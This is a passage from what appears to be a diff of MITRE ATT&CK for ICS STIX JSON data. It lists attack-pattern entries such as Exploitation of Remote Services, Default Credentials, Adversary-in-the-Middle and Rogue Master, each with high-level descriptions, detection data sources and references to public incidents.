"Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0856", + "external_id": "T0856" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Exploitation of Remote Services", + "description": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse. A common goal for post-compromise exploitation of remote services is for initial access into and lateral movement throughout the ICS environment to enable access to targeted systems. (Citation: Enterprise ATT&CK)\n\nICS asset owners and operators have been affected by ransomware (or disruptive malware masquerading as ransomware) migrating from enterprise IT to ICS environments: WannaCry, NotPetya, and BadRabbit. In each of these cases, self-propagating (wormable) malware initially infected IT networks, but through exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks, producing significant impacts. (Citation: Joe Slowik April 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Data Historian", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0866", + "external_id": "T0866" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Exploitation of Remote Services Retrieved. 2019/10/27 ", + "url": "https://attack.mitre.org/techniques/T1210/" + }, + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Default Credentials", + "description": "Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. (Citation: Keith Stouffer May 2015)\n\nDefault credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. Adversaries may leverage default credentials that have not been properly modified or disabled.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Control Server", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Creation", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0812", + "external_id": "T0812" + }, + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:16:55.602Z", + "name": "External Remote Services", + "description": "Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire)\n\nExternal remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. \n\nAs they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Input/Output Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Logon Session: Logon Session Metadata", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0822", + "external_id": "T0822" + }, + { + "source_name": "Daniel Oakley, Travis Smith, Tripwire", + "description": "Daniel Oakley, Travis Smith, Tripwire Retrieved. 2018/05/30 ", + "url": "https://attack.mitre.org/wiki/Technique/T1133" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-29T16:17:27.903Z", + "name": "Brute Force I/O", + "description": "Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary's goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point. \n\nAdversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment or damage to downstream equipment.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0806", + "external_id": "T0806" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Detect Program State", + "description": "Adversaries may seek to gather information about the current state of a program on a PLC. State information reveals information about the program, including whether it's running, halted, stopped, or has generated an exception. This information may be leveraged as a verification of malicious program execution or to determine if a PLC is ready to download a new program.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--94f042ae-3033-4a8d-9ec3-26396533a541", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0870", + "external_id": "T0870" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Adversary-in-the-Middle", + "description": "Adversaries with privileged network access may seek to modify network traffic in real time using adversary-in-the-middle (AiTM) attacks. (Citation: Gabriel Sanchez October 2017) This type of attack allows the adversary to intercept traffic to and/or from a particular device on the network. If a AiTM attack is established, then the adversary has the ability to block, log, modify, or inject traffic into the communication stream. There are several ways to accomplish this attack, but some of the most-common are Address Resolution Protocol (ARP) poisoning and the use of a proxy. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) \n\nAn AiTM attack may allow an adversary to perform the following attacks: \n[Block Reporting Message](https://attack.mitre.org/techniques/T0804), [Spoof Reporting Message](https://attack.mitre.org/techniques/T0856), [Modify Parameter](https://attack.mitre.org/techniques/T0836), [Unauthorized Command Message](https://attack.mitre.org/techniques/T0855)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Conrad Layne - GE Digital" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Windows Registry: Windows Registry Key Modification", + "Service: Service Creation", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0830", + "external_id": "T0830" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Gabriel Sanchez October 2017", + "description": "Gabriel Sanchez 2017, October Man-In-The-Middle Attack Against Modbus TCP Illustrated with Wireshark Retrieved. 2020/01/05 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/man-in-the-middle-attack-modbus-tcp-illustrated-wireshark-38095" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Exploitation for Evasion", + "description": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection. Vulnerabilities may exist in software that can be used to disable or circumvent security features. \n\nAdversaries may have prior knowledge through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888) about security features implemented on control devices. These device security features will likely be targeted directly for exploitation. There are examples of firmware RAM/ROM consistency checks on control devices being targeted by adversaries to enable the installation of malicious [System Firmware](https://attack.mitre.org/techniques/T0857).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0820", + "external_id": "T0820" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Control", + "description": "Adversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)\n\nThe German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill in its 2014 IT Security Report.(Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact resulted in damage and unsafe conditions from the uncontrolled shutdown of a blast furnace.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0827", + "external_id": "T0827" + }, + { + "source_name": "BSI State of IT Security 2014", + "description": "Bundesamt fr Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security) 2014 Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany) Retrieved. 2019/10/30 ", + "url": "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Change Program State", + "description": "Adversaries may attempt to change the state of the current program on a control device. Program state changes may be used to allow for another program to take over control or be loaded onto the device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--a8cfd474-9358-464f-a169-9c6f099a8e8a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0875", + "external_id": "T0875" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-13T13:32:08.619Z", + "name": "Hooking", + "description": "Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK)\n\nOne type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a process IAT, where pointers to imported API functions are stored. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Process: Process Metadata", + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0874", + "external_id": "T0874" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Hooking Retrieved. 2019/10/27 ", + "url": "https://attack.mitre.org/techniques/T1179/" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Control Device Identification", + "description": "Adversaries may perform control device identification to determine the make and model of a target device. Management software and device APIs may be utilized by the adversary to gain this information. By identifying and obtaining device specifics, the adversary may be able to determine device vulnerabilities. This device information can also be used to understand device functionality and inform the decision to target the environment.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--abb0a255-eb9c-48d0-8f5c-874bb84c0e45", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0808", + "external_id": "T0808" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Program Organization Units", + "description": "Program Organizational Units (POUs) are block structures used within PLC programming to create programs and projects. (Citation: Guidance - IEC61131) POUs can be used to hold user programs written in IEC 61131-3 languages: Structured text, Instruction list, Function block, and Ladder logic. (Citation: Guidance - IEC61131) Application - 201203 They can also provide additional functionality, such as establishing connections between the PLC and other devices using TCON. (Citation: PLCBlaster - Spenneberg)\n \nStuxnet uses a simple code-prepending infection technique to infect Organization Blocks (OB). For example, the following sequence of actions is performed when OB1 is infected (Citation: Stuxnet - Symantec - 201102):\n*Increase the size of the original block.\n*Write malicious code to the beginning of the block.\n*Insert the original OB1 code after the malicious code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--ae62fe1a-ea1a-479b-8dc0-65d250bd8bc7", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0844", + "external_id": "T0844" + }, + { + "source_name": "Guidance - IEC61131", + "description": "John Karl-Heinz. (n.d.). Programming Industrial Automation Systems. Retrieved October 22, 2019.", + "url": "http://www.dee.ufrj.br/controle%20automatico/cursos/IEC61131-3%20Programming%20Industrial%20Automation%20Systems.pdf" + }, + { + "source_name": "PLCBlaster - Spenneberg", + "description": "Spenneberg, Ralf, Maik Brüggemann, and Hendrik Schwartke. (2016, March 31). Plc-blaster: A worm living solely in the plc.. Retrieved September 19, 2017.", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + }, + { + "source_name": "Stuxnet - Symantec - 201102", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.", + "url": "https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20stuxnet%20dossier.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Graphical User Interface", + "description": "Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard.\n\nIf physical access is not an option, then access might be possible via protocols such as VNC on Linux-based and Unix-based operating systems, and RDP on Windows operating systems. An adversary can use this access to execute programs and applications on the target machine.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Module: Module Load", + "Command: Command Execution", + "Logon Session: Logon Session Creation", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0823", + "external_id": "T0823" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:18:41.277Z", + "name": "Rogue Master", + "description": "Adversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection. \n\nIn the case of the 2017 Dallas Siren incident, adversaries used a rogue master to send command messages to the 156 distributed sirens across the city, either through a single rogue transmitter with a strong signal, or using many distributed repeaters. (Citation: Bastille April 2017) (Citation: Zack Whittaker April 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Engineering Workstation" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Asset: Asset Inventory" + ], + "type": "attack-pattern", + "id": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0848", + "external_id": "T0848" + }, + { + "source_name": "Bastille April 2017", + "description": "Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06 ", + "url": "https://www.bastille.net/blogs/2017/4/17/dallas-siren-attack" + }, + { + "source_name": "Zack Whittaker April 2017", + "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ", + "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Native API", + "description": "Adversaries may directly interact with the native OS application programming interface (API) to access system functions. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. (Citation: The MITRE Corporation May 2017) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying 